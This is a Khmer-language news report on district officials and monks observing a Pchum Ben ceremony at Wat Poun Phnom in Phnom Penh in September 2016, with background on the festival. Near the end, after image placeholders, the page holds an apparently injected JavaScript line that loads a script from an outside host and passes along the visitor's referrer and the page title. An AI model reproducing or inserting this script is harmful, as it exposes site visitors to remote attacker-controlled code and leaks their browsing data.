លោកហែម ដារិទ្ធិ និងភរិយា រួមទាំងមន្ត្រីសាលាខណ្ឌពោធិ៍សែនជ័យចូលរួមពិធី កាន់បិណ្ឌ សូត្រមន្ត រាប់បាត នៅវត្តពូនភ្នំ

ភ្នំពេញ៖ លោក ហែម ដារិទ្ធិ និងក្រុមគ្រួសារ រួមទាំងមន្ត្រីសាលាខណ្ឌពោធិ៍សែនជ័យបានចូលរួមក្នុងពិធីកាន់ បិណ្ឌ សូត្រមន្ត និងរាប់បាតព្រមគ្នា ដែលប្រារព្ធឡើងក្នុងវត្តពូនភ្នំ ស្ថិតក្នុងសង្កាត់សំរោង ខណ្ឌពោធិ៍សែនជ័យ រាជធានីភ្នំពេញ នាព្រឹក ទី២៥ ខែកញ្ញា ឆ្នាំ២០១៦។

ក្នុងពិធីកាន់បិណ្ឌទី៩នេះ មានការអញ្ជើញចូលរួមពីសំណាក់ លោក ក្រូច ផាន ប្រធានក្រុមប្រឹក្សាខណ្ឌពោធិ៍ សែនជ័យ លោក ម៉ប់ សារិន ប្រធានក្រុមប្រឹក្សារាជធានីភ្នំពេញ ព្រមទាំងអភិបាលរង មន្ត្រីសាលាខណ្ឌ សង្កាត់ និងក្រុមយុវជនជាច្រើនរូបទៀត ។

ក្នុងនោះដែរ ថ្នាក់ដឹកនាំខណ្ឌពោធិ៍សែនជ័យ និងមន្ដ្រីរាជការ បានប្រគេននូវ ចង្ហាន់ ទេយ្យទាន និងបច្ច័យ មួយចំនួនថ្វាយព្រះសង្ឃ ដើម្បីបានបំពេញបុណ្យកុសល ឧទ្ទិសជូនទៅដល់វិញ្ញាណខន្ធបុព្វការីជន មានមាតា បិតា ជីដូន ជីតា និងញាតិកាទាំង៧សន្តាន ព្រមទាំងឧទ្ទិសបុណ្បកុសលជូនជនរួមជាតិគ្រប់ៗគ្នាផងដែរ៕

បន្ទាប់ពីការគោរពថ្វាយភូងផ្កា បូជាទៀនធូប ចំពោះព្រះពុទ្ធរូបព្រះសម្មាសម្ពុទ្ធ និង នមស្សការ ព្រះរតនត្រ័យទៅ តាមគន្លងព្រះធម៌ព្រះសម្មាសម្ពុទ្ធរួចមក និង លោកលោកស្រីថ្នាក់ដឹកនាំខណ្ឌពោធិ៍សែនជ័យ និងបងប្អូនញាតិមិត្ត ពុទ្ធបរិស័ទបានធ្វើពិធីរាប់បាត្របង្សុកូល ឧទ្ទិសកុសលផលបុណ្យ ជូនដល់ដួងវិញ្ញាណក្ខ័ន្ត ចំពោះមាតាបិតាជីដូនជីតា និងញាតិកាលទាំង៧សន្តាន ដែលបានចែកឋានទៅកាន់បរលោកខាងមុខហើយនោះ ព្រមទាំងឧទ្ទិសដល់គោរពវិញ្ញាណក្ខន្ធដល់កម្មាភិបាល យុទ្ធជន ដែលបានពលីជីវិត ក្នុងបុព្វហេតុការពារកសាង អភិវឌ្ឍន៍ជាតិមាតុភូមិកម្ពុជា សូមឲ្យមកទទួលនូវផល្លានិសង្ឃដែល ឯកឧត្តម លោកជំទាវ និង ថ្នាក់ ដឹកនាំ បានឧទ្ទិសជូនតាមរយៈព្រះសង្ឃ ដែលជាស្រែបុណ្យក្នុងរដូវកាលបុណ្យកាន់បិណ្ឌ និងភ្ជុំបិណ្ឌនេះ និងសូមឲ្យអំណាចនៃអានិសង្ឃនេះជួយទ្រទ្រង់ឲ្យវិញ្ញាណក្ខន្ឋអ្នកទាំងនោះ បានទៅកាន់ទីសោយសុខឋានបរម សុខកុំបីឃ្លៀងឃ្លាតក្នុងឋានសុគតិភពកុំបីខានឡើយ។ដូច្នេះការប្រារព្ធធ្វើពិធីបុណ្យភ្ជុំបិណ្ឌនេះឡើង ក្នុងគោលបំណងដើម្បីឧទ្ទិសមហាកុសល់ជូនដល់លោកអ្នកមានគុណមានមាតាបិតាជីដូនជីតា ញាតិកាលទាំង៧សណ្តានដែលបានបាក់ បែកចែកឋានទៅកាន់បរលោកទៅហើយនោះនិង ជួយរំដោះឲ្យរួចចាកផុតពីទុក្ខ ទោសទាំងឡាយ ឧបាយភូមិណាមួយ និងឲ្យបានទៅកាន់សុគតិភពថ្មី ហើយងាកក្រោយមកជួយបីបាច់ថែ រក្សា កូនចៅ ឲ្យមានសេចក្ដី សុខសប្បាយក្នុងក្រុមគ្រួសារ សង្គមជាតិផងដែរ។

គួររំលឹកដែរថា ពិធីបុណ្យកាន់បិណ្ឌត្រូវបានបុរាណណាចារ្យរាជបណ្ឌិតខ្មែររៀបចំរយៈពេល១៥ថ្ងៃ ដោយចាប់គិតពីថ្ងៃទី ០១ រោចដល់ថ្ងៃ ១៥រោច ខែភទ្របទជាពិធីមួយសម្រាប់ឧទ្ទិសកុសលទៅដល់ប្រេតជនញាតិដែលបានស្លាប់ទៅនោះ។ ពុទ្ធបរិស័ទចាប់ផ្ដើមធ្វើពីថ្ងៃ ១រោច រហូតដល់ថ្ងៃ ១៤រោច ជាវារកភត្ត(ភត្តធ្វើតាមថ្ងៃ)ជាបន្តបន្ទាប់។ ចំណែកមួយថ្នាក់ទៀតគេធ្វើនៅថ្ងៃ ១៥រោច ដែលគេហៅថាបុណ្យភ្ជុំ។ ពិធីបុណ្យទាំងពីរថ្នាក់នេះ បច្ចុប្បន្នត្រូវបានបូកបញ្ចូលគ្នា ហើយហៅកាត់ថាពិធីបុណ្យភ្ជុំបិណ្ឌនេះឯង។ តាមការបញ្ជាក់របស់តាអាចារ្យបានឲ្យដឹងថា ក្នុងជំនឿកាន់បិណ្ឌនេះត្រូវបានប្រជាពលរដ្ឋខ្មែរនាំគ្នាគោរពប្រតិបត្តិយ៉ាងខ្ជាប់ខ្ជួនតាំងពីសម័យបុរាណរហូតមកដល់សតវត្សរ៍ទី ២១នេះ។

ម្យ៉ាងទៀតពិធីបុណ្យកាន់បិណ្ឌភ្ជុំបិណ្ឌនេះ ក៏បានបង្ហាញនូវការសាមគ្គីភាពរបស់ប្រជាពលរដ្ឋខ្មែរយើងផងដើម្បីនាំយកចង្ហាន់ និងទេយ្យទានផ្សេងៗសម្រាប់យកទៅផ្គត់ផ្គង់ដល់ព្រះសង្ឃដែលគង់នៅចាំព្រះវស្សាអស់កាលត្រីមាសដែលព្រះសង្ឃមានការលំបាកខ្វះខាតចង្ហាន់និងលំបាកក្នុងការនិមន្តបិណ្ឌបាត្រនារដូវវស្សាផងដែរ៕

image image image image image image image

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More